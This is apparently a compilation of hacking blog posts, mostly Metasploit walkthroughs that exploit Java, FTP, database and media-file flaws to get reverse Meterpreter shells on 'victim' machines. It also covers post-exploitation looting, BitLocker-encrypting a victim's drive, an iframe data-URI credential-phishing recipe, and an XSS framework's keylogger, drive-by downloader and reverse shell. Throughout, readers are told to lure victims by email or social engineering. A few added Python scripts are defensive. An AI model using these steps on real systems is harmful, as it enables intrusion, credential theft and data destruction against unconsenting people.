Channel: Hacking Articles | Raj Chandel's Blog

How to Gather Recent Files Dump of Remote PC

The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.
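The fields the module pulls from a .lnk are laid out in the Shell Link header and LinkInfo structures (MS-SHLLINK). As an added example, not part of the original post or of the dumplinks module, this Python script parses exactly those forensic fields (MAC timestamps, local path, volume label and serial) from a constructed sample link; the path, label and serial number in `build_sample_lnk()` are made up for the demonstration.

```python
"""Parse the forensic fields of a Windows Shell Link (.lnk) file (MS-SHLLINK).

Added example, not the dumplinks module: the link returned by
build_sample_lnk() is constructed here, not taken from a real machine.
"""
import struct
from datetime import datetime, timedelta, timezone

HAS_LINK_TARGET_ID_LIST = 0x01        # LinkFlags bit: an IDList follows the header
HAS_LINK_INFO = 0x02                  # LinkFlags bit: a LinkInfo structure is present
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01  # LinkInfoFlags bit
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}


def filetime_to_datetime(ft):
    """FILETIME is a count of 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    d = dt - FILETIME_EPOCH
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def cstring(buf, off):
    """NUL-terminated ANSI string starting at off."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data):
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize: not a shell link")
    if data[4:20] != LINK_CLSID:
        raise ValueError("bad LinkCLSID: not a shell link")
    flags, attrs, ctime, atime, wtime, size = struct.unpack_from("<IIQQQI", data, 20)
    info = {
        "attributes": attrs,
        "file_size": size,
        "created": filetime_to_datetime(ctime),
        "accessed": filetime_to_datetime(atime),
        "modified": filetime_to_datetime(wtime),
    }
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:
        # Skip the IDList (2-byte size prefix); the path we want is in LinkInfo.
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        _, _, li_flags, vol_off, base_off = struct.unpack_from("<IIIII", data, off)
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            vol = off + vol_off
            _, drive_type, serial, label_off = struct.unpack_from("<IIII", data, vol)
            info["drive_type"] = drive_type            # 3 = DRIVE_FIXED
            info["volume_serial"] = f"{serial:08X}"
            info["volume_label"] = cstring(data, vol + label_off)
            info["local_base_path"] = cstring(data, off + base_off)
    return info


def build_sample_lnk():
    """Constructed sample: a link to a spreadsheet on a fixed drive labelled OSDisk."""
    label = b"OSDisk\x00"
    volume_id = struct.pack("<IIII", 16 + len(label), 3, 0x1A2B3C4D, 16) + label
    base_path = b"C:\\Users\\victim\\Documents\\budget.xlsx\x00"
    body = volume_id + base_path + b"\x00"   # trailing NUL = empty CommonPathSuffix
    hdr = 28                                 # LinkInfoHeaderSize without Unicode offsets
    link_info = struct.pack("<IIIIIII", hdr + len(body), hdr, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            hdr, hdr + len(volume_id), 0, hdr + len(body) - 1) + body
    ft = datetime_to_filetime(datetime(2013, 3, 1, 9, 30, tzinfo=timezone.utc))
    header = struct.pack("<I", 0x4C) + LINK_CLSID + struct.pack(
        "<IIQQQIIIHHII", HAS_LINK_INFO, 0x20, ft, ft, ft, 48213, 0, 1, 0, 0, 0, 0)
    return header + link_info


if __name__ == "__main__":
    for key, value in parse_lnk(build_sample_lnk()).items():
        print(f"{key:>16}: {value}")
```

Point the parser at a real file with `parse_lnk(open(path, "rb").read())`; links that carry only an IDList and no LinkInfo will return the header fields alone.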

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

Open a Backtrack terminal and type msfconsole


Now type use post/windows/gather/dumplinks
msf exploit (dumplinks)>set session 1
msf exploit (dumplinks)>exploit  


Exploit Windows, Linux or MAC PC using Java Applet JMX Remote Code Execution

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in February of 2013. Additionally, this module bypasses the default security settings introduced in Java 7 Update 10 to run unsigned applets without displaying any warning to the user.

Exploit Targets
Java 7 Update 10
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean_2)>exploit 


Now give your victim the URL http://192.168.1.7:8080/


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID” to connect to that session.

OWASP Xenotix XSS Exploit Framework v3 2013

Introduction
Cross Site Scripting (XSS) vulnerabilities have been reported and exploited since the 1990s. XSS was listed as the third most critical vulnerability in the OWASP 2013 web application vulnerabilities list. Cross-site scripting is a type of security vulnerability typically found in web applications that allows attackers to inject client-side script into web pages viewed by other users. The injected code executes on the client side. A cross-site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potential of XSS vulnerabilities was not understood: XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered a high-risk vulnerability. Later, XSS tunneling and payload delivery showed the real potential of XSS vulnerabilities. Most large websites like Google, Facebook, Twitter, Microsoft and Amazon still suffer from XSS bugs even now. That is a brief introduction to XSS.

Some threats due to XSS
XSS Tunneling: With an XSS tunnel a hacker can obtain the traffic between the victim and a web server.
Client-side code injection: A hacker can inject malicious code and execute it on the client side.
DoS: A hacker can perform DoS against a remote server or against the client itself.
Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.
Malware Spreading: A hacker can spread malware through a website which is vulnerable to XSS.
Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.
Defacing: Temporary or permanent defacement of the web application is possible.

What is Xenotix XSS Exploit Framework?


Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. This tool can inject code into web pages which are vulnerable to XSS. It is basically a payload-list-based XSS scanner and XSS exploitation kit. It gives a penetration tester the ability to test all the XSS payloads in the payload list against a web application. The tool supports both a manual mode and an automated, time-sharing-based test mode. The exploitation framework in the tool includes an XSS encoder, a victim-side XSS keystroke logger, an executable drive-by downloader, an XSS reverse shell and an XSS DDoSer. These exploitation tools help the penetration tester create proof-of-concept attacks on vulnerable web applications while writing a penetration test report.

Features of Xenotix XSS Exploit Framework
Xenotix XSS Exploit Framework is divided into two modules:

 Scanner Module
  • Built in XSS Payloads
  • HTML5 compatible payload list
  • XSS Auto mode Scanner
  • XSS Multi-Parameter Scanner
  • XSS Fuzzer
Exploitation Framework
  • XSS Keylogger
  • XSS Executable Drive-by downloader
  • XSS Payload Encoder
  • XSS Reverse Shell
  • XSS DDoSer
  • XSS Cookie Thief
1. Scanner Module

Built in Payload List
It has an inbuilt list of over 500 XSS payloads, including HTML5-compatible XSS injection payloads. Most XSS filters are implemented using a string-replace filter, the htmlentities filter or the htmlspecialchars filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.
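The contrast the paragraph draws, a string-replace blacklist versus an htmlspecialchars-style encoder, can be made concrete. This added Python example is not part of Xenotix: `weak_filter()` is a blacklist of the kind described, `escape_html_text()` is the encoder, and the inputs in `SAMPLES` are constructed to show that the blacklist only stops the one spelling it knows while context-appropriate output encoding removes the whole class of bug.

```python
"""Blacklist 'filters' versus output encoding for reflected XSS.

Added example, not part of Xenotix. weak_filter() is the string-replace style
filter the text mentions; escape_html_text() is the htmlspecialchars-style
encoder that neutralises markup regardless of the payload's spelling.
"""
import html

SAMPLES = [  # constructed inputs a tester might send in a query parameter
    "hello world",
    "<script>alert(1)</script>",          # the one string the blacklist knows
    "<ScRiPt>alert(1)</ScRiPt>",          # case variation defeats str.replace
    "<scr<script>ipt>alert(1)</script>",  # removing the inner tag rebuilds the outer one
]


def weak_filter(user_input):
    """String-replace blacklist: strips one exact spelling of one tag."""
    return user_input.replace("<script>", "").replace("</script>", "")


def escape_html_text(user_input):
    """Equivalent of PHP htmlspecialchars(..., ENT_QUOTES): < > & " ' become entities."""
    return html.escape(user_input, quote=True)


def render_unsafe(user_input):
    """Reflects the parameter into HTML text context after the blacklist."""
    return f"<p>You searched for: {weak_filter(user_input)}</p>"


def render_safe(user_input):
    """Same page, reflected through the encoder instead."""
    return f"<p>You searched for: {escape_html_text(user_input)}</p>"


def reflected_markup(rendered, prefix="<p>You searched for: ", suffix="</p>"):
    """True if a raw tag delimiter survives inside the user-controlled region."""
    body = rendered[len(prefix):-len(suffix)]
    return "<" in body or ">" in body


def audit(samples=SAMPLES):
    """Per sample: (blacklist lets markup through?, encoder lets markup through?)."""
    return {s: (reflected_markup(render_unsafe(s)), reflected_markup(render_safe(s)))
            for s in samples}


if __name__ == "__main__":
    for sample, (weak_leaks, safe_leaks) in audit().items():
        print(f"{sample!r:42} blacklist leaks: {weak_leaks!s:5}  encoder leaks: {safe_leaks}")
```

`html.escape` is correct only for HTML text and quoted attribute values; data placed inside a script block, a URL or a CSS value needs the encoder for that context.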


The above chart shows the number of XSS payloads in the different XSS scanning tools available on the market. Xenotix XSS Exploit Framework has the world's second largest XSS payload list, after IBM AppScan Security, which has 700 million payloads.

XSS Scanner Module




XSS Multi-Parameter Scanner


The Multi-Parameter XSS Scanner comes in when you have multiple parameters to test for XSS. It extracts the different parameters from the given URL and tests them individually. It saves a lot of time, as you don't need to test each parameter separately.

XSS Fuzzer


The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Pollution. With the Fuzzer, one can conduct out-of-the-box fuzzing to detect hidden vulnerabilities in a web application.

2. Exploitation Framework
XSS Keylogger


The tool includes an inbuilt victim-side keylogger implemented using JavaScript and PHP. PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and presented to the victim. The script captures the keystrokes made by the victim and sends them to a PHP file, which writes the logs to a text file.




XSS Executable Drive-by Downloader


A Java drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable on the victim's system without his knowledge or permission. You specify the URL of the malicious executable, embed the drive-by webpage into an XSS-vulnerable page and serve it to your victim. When the victim views the injected page, the Java applet client.jar accesses the command prompt and, with the help of the echo command, writes a Visual Basic script named winconfig.vbs into the temp directory (%temp%); cmd.exe then starts winconfig.vbs. winconfig.vbs downloads the malicious executable from the URL you specified into the temp directory, renames it update.exe and finally executes it. The download and execution of the malicious executable happen without the knowledge or permission of the victim.




XSS Payload Encoder
The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.

XSS Reverse Shell
An XSS reverse shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of the Java drive-by. When the XSS-vulnerable web application, exploited with the injectable scripts generated by XSS Reverse Shell, is presented to a victim, it initiates the drive-by download of a reverse-TCP-connecting shell. After the drive-by download, the reverse shell is executed by the same method used in the Java drive-by.


The advantage of this method is that the reverse shell is downloaded and executed on the victim's system without his knowledge. However, executing the reverse shell pops up a UAC dialog requesting permission to run the executable. The tool has an inbuilt listener that listens for the reverse shell. It is designed in a user-friendly manner: all you have to do is specify the reverse connection IP and port.



XSS DDoSer



With HTML5 comes great power. We harness the power of HTML5 to abuse Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack. WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to the opening or closing of a WebSocket. XMLHttpRequest is a JavaScript object used to exchange data between a server and a browser behind the scenes; it can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it, by abusing CORS, the add-on creates numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross-site requests, the browser at times refuses to send more requests to the same URL. However, this can be easily bypassed by making every request unique by adding a non-existent query-string parameter with changing values.






XSS Cookie Thief


It is the traditional cookie stealer, but a bit more advanced and with a real-time cookie viewer. This module allows the pentester to create a cookie-stealing POC.

Features for the Next Build
The current version of XSS Exploit Framework is based on Internet Explorer's webpage rendering engine, Trident. Since XSS behaves slightly differently in different web browsers, support for the Gecko (used by Mozilla Firefox) and WebKit (used by Chrome, Opera and Safari) rendering engines will be added in the next build. Support for XSS in POST parameters and XSS testing by modifying the headers will be included in the next build. An XSS proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable to XSS and DOM-based XSS detection will be added in the next build.

Conclusion
XSS in a popular website is a high security threat. Xenotix XSS Exploit Framework can be used by security analysts to perform penetration tests on web applications against XSS vulnerabilities and to create POCs with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS scanners or XSS exploitation tools. Xenotix XSS Exploit Framework is the first of its kind to act both as an XSS vulnerability scanner and as an XSS exploitation framework. Bug bounty programs like the Google Vulnerability Reward Program, Facebook Bounty, PayPal bug bounty, etc. exist, so go XSS hunting and grab your bounty.

About Author
Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He has published various whitepapers and tools in the field of information security. He was one of the top 10 in Chakravyuh 2012, India's biggest ethical hacking competition. His areas of interest include web application penetration testing, coding tools, exploit development and fuzzing. He has spoken at many security conferences, including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.

Hack Windows PC using Firebird Relational Database CNCT Group Number Buffer Overflow

This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which overwrites a pointer, allowing the attacker to control where data is read from. Shortly following the controlled read, the pointer is called, resulting in code execution. The vulnerability exists in a group number extracted from the CNCT information, which is sent by the client and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot allows executing the ROP chain, which is ultimately used to execute VirtualAlloc and bypass DEP.

Exploit Targets
Windows FB 2.5.2.26539 (default)
Windows FB 2.5.1.26351
Windows FB 2.1.5.18496

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/misc/fb_cnct_group
msf exploit (fb_cnct_group)>set payload windows/meterpreter/reverse_tcp
msf exploit (fb_cnct_group)>set lhost 192.168.0.102 (IP of Local Host)
msf exploit (fb_cnct_group)>set rhost 192.168.0.111 (IP Address of Victim PC)
msf exploit (fb_cnct_group)>exploit 

How to install Kali linux

First download Kali Linux from here.
Boot your PC from the Kali Linux media. Once booted, select Graphical Install.


Select your language and click continue.


Select your Location and click continue.


Configure your Keyboard and click continue




Type Your Desired Host name and click continue.


Click continue


Set your root password and click continue.


Configure the Clock and click continue.


Now Click on Guided - Use entire disk and click continue.


Now click continue.


Now Click on All Files in One Partition and click continue.


Now click continue.


Select option yes and click continue


Select option no and click continue


Select option yes and click continue.


The installation is now complete.


Log into Kali Linux with the username and password




Hack Windows PC using Java CMM Remote Code Execution

This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the Java warning in order to run the malicious applet.

Exploit Targets
Java 7 Update 15
Windows PC

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/browser/java_cmm
msf exploit (java_cmm)>set payload windows/meterpreter/reverse_tcp
msf exploit (java_cmm)>set lhost 192.168.0.108 (IP of Local Host)
msf exploit (java_cmm)>set srvhost 192.168.0.108 (This must be an address on the local machine)
msf exploit (java_cmm)>set uripath / (The URL to use for this exploit)
msf exploit (java_cmm)>exploit 


Now give your victim the URL http://192.168.0.108:8080


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID” to connect to that session.



How to Encrypt Drive of Remote Victim PC

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

Once you have the Meterpreter session, use the ‘shell’ command to get a command prompt on the target.
Type manage-bde -status and press Enter.



Run the following command to enable BitLocker on the desired drive of the target PC (the G: drive in my case), store the recovery key in the c:/windows/system directory, and generate a random recovery password:

manage-bde -on g:  -RecoveryKey c:/windows/system -RecoveryPassword



Hack Email Password using Iframe URI Phishing

First of all, download Super Phisher and create a phishing page (How to Create Phishing Page).


To get the URL of the phishing page, upload the page to any web host / localhost (XAMPP in my case).


Replace the URL in the iframe code with the URL of the uploaded phishing page.


Now visit http://dopiaza.org/tools/datauri/ , select the Provide Text option on the URL Generator page and paste the modified exploit code (as shown above).

Once the code has been pasted into the text area, click on Generate Data URL.




We will get the code as shown above after generating the URL.

In the generated code, replace “plain” with “html”.


Shorten the above data URL using “www.tinyurl.com”.


Now send the shortened URL to the victim.


As soon as the victim enters his credentials, you will receive them.
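The step that makes this trick work is the MIME swap from text/plain to text/html: a browser renders the latter, iframe included. As an added example from the detection side (not part of the article or of Super Phisher), this Python script decodes data: URLs found in links and flags those that deliver an HTML document inline; the sample links and the phish.example host are constructed placeholders. Shortened links would have to be expanded before this check, which the script does not do.

```python
"""Flag data: URLs that carry an HTML document (the Iframe URI phishing trick).

Added example, not part of the article. The links in SAMPLES are constructed
here; phish.example is a placeholder, not a real host.
"""
import base64
import re
from urllib.parse import unquote

# data:[<mediatype>][;param...],<data>  (RFC 2397)
DATA_URL = re.compile(r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<body>.*)$", re.S)
HTML_MIMES = {"text/html", "application/xhtml+xml", "image/svg+xml"}
EMBED_TAGS = re.compile(r"<(iframe|form|script|object|embed)\b", re.I)


def decode_data_url(url):
    """Return (mime, decoded text) or None when the link is not a data: URL."""
    m = DATA_URL.match(url.strip())
    if not m:
        return None
    mime = (m.group("mime") or "text/plain").lower()   # RFC default when omitted
    body = m.group("body")
    if ";base64" in m.group("params").lower():
        # Re-pad so that URLs copied without their trailing '=' still decode.
        body = base64.b64decode(body + "=" * (-len(body) % 4)).decode("utf-8", "replace")
    else:
        body = unquote(body)
    return mime, body


def classify(url):
    """('not-data' | 'clean' | 'suspicious', reason)."""
    decoded = decode_data_url(url)
    if decoded is None:
        return "not-data", ""
    mime, body = decoded
    if mime not in HTML_MIMES:
        return "clean", f"{mime} cannot run markup"      # the 'plain' variant renders as text
    tag = EMBED_TAGS.search(body)
    if tag:
        return "suspicious", f"{mime} document embeds <{tag.group(1).lower()}>"
    return "suspicious", f"{mime} document delivered inline"


# Constructed samples: a normal link, the text/plain data URL as the generator
# emits it, the same URL after the plain->html swap, and a harmless inline page.
PHISH_HTML = ('<html><body><iframe src="http://phish.example/login.html" '
              'width="100%" height="100%"></iframe></body></html>')
SAMPLES = [
    "https://mail.example.com/inbox",
    "data:text/plain;base64," + base64.b64encode(PHISH_HTML.encode()).decode(),
    "data:text/html;base64," + base64.b64encode(PHISH_HTML.encode()).decode(),
    "data:text/html,%3Ch1%3EHello%3C%2Fh1%3E",
]

if __name__ == "__main__":
    for link in SAMPLES:
        verdict, reason = classify(link)
        print(f"{verdict:10} {reason:40} {link[:60]}")
```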


Reference URL: http://packetstormsecurity.com/files/121389/Iframe-URI-Phishing.html

Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact.

Exploit Targets
FreeFloat FTP Server

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/ftp/freefloatftp_user
msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp
msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)
msf exploit (freefloatftp_user)>exploit  


Hack Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a type confusion, due to weak access control when setting final fields on static classes, and run code outside of the Java sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play through a specially crafted JNLP file. This bypass applies mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise the applet is launched without the click-to-play bypass.

Exploit Targets
Java 7 Update 17
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/java_jre17_reflection_types
msf exploit (java_jre17_reflection_types)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (java_jre17_reflection_types)>set target 1
msf exploit (java_jre17_reflection_types)>set srvhost 192.168.0.106 (This must be an address on the local machine)
msf exploit (java_jre17_reflection_types)>set payload windows/meterpreter/reverse_tcp
msf exploit (java_jre17_reflection_types)>exploit


Now give your victim the URL http://192.168.0.106:8080/Mt7fUKs955I

When the victim opens that link in their browser, a dialog box warning that the digital signature cannot be verified will immediately appear, like the picture below.



Now you have access to the victim's PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID” to connect to that session.


CutyCapt - A Qt WebKit Web Page Rendering Capture Utility

CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF and BMP.

First download CutyCapt from here.

Open a command prompt in the CutyCapt directory and type the following command:

CutyCapt --url=http://www.example.com --out=anyfile.pdf (Convert to PDF format)

CutyCapt --url=http://www.example.com --out=anyfile.jpg (Convert to an image file)


In Kali Linux

Open your Kali Linux terminal and type:

cutycapt --url=http://www.example.com --out=anyfile.pdf (To convert to PDF format)

cutycapt --url=http://www.example.com --out=anyfile.jpg (To convert to an image file)



Hack Windows PC using AudioCoder .M3U Buffer Overflow

This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability occurs when adding an .m3u file, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
AudioCoder 0.8.18

Requirement
Metasploit

Open your metasploit terminal


Now type use exploit/windows/fileformat/audio_coder_m3u
msf exploit (audio_coder_m3u)>set payload windows/meterpreter/reverse_tcp
msf exploit (audio_coder_m3u)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (audio_coder_m3u)>exploit


After we successfully generate the malicious .m3u file, it will be stored on your local computer at
C:/Users/User/.msf4/local/msf.m3u


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your msf.m3u file to the victim; as soon as they download and open it, you will have a Meterpreter shell on the victim's computer.





Exploit Remote PC using ERS Viewer 2011 ERS File Handling Buffer Overflow

This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll, where the function ERM_convert_to_correct_webpath handles user-provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
ERS Viewer 2011 (v11.04)

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/fileformat/erdas_er_viewer_bof
msf exploit (erdas_er_viewer_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_bof)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (erdas_er_viewer_bof)>exploit  


After we successfully generate the malicious .ers file, it will be stored on your local computer at
/root/.msf4/local/msf.ers


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
exploit
Now send your msf.ers file to the victim; as soon as they download and open it, you will have a Meterpreter shell on the victim's computer.


Recover Deleted Data from Remote Victim PC

This module lists and tries to recover deleted files from NTFS file systems. Use the FILES option to guide recovery: leave it empty to enumerate deleted files in the DRIVE, set it to an extension (e.g. "pdf") to recover deleted files with that extension, or set it to a comma-separated list of IDs (from the enumeration) to recover those files. Be aware that file enumeration and recovery can take a long time; use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).

Exploit Targets
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

Open your backtrack terminal and type msfconsole


Run the following command to list all the drives of victim PC

Now type use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit  


Run the following command to recover the deleted data of the Victim PC
(I am using H: drive in my case)

Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive h:
msf exploit (recovery_files)>exploit   


Run the following command to save the deleted data to /root/.msf4/loot
msf exploit (recovery_files)>set files 1073777664,1073778688,1073779212

